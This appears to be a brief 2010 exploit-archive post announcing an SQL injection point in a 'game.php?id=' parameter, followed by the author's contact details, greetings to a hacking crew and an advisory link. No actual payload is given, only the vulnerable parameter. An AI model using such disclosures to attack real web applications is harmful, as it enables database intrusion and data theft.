http://127.0.0.1/path/game.php?id=[] <== SQLi





###############################################

MaiL: sukihack[at]gmail[dot]com
Home: http://a-h-crew.net/
Greetz To : Ton![w]indowS,X-net,b4cKd00r,DarKHackeR.,The|DennY',EaglE EyE,Lekosta,All Members From A-H-Crew.Net & All Albanian/Kosova Hackers

###############################################


# 1337day.com [2010-05-27]


ADVISORY LINK: http://1337day.com/exploits/12415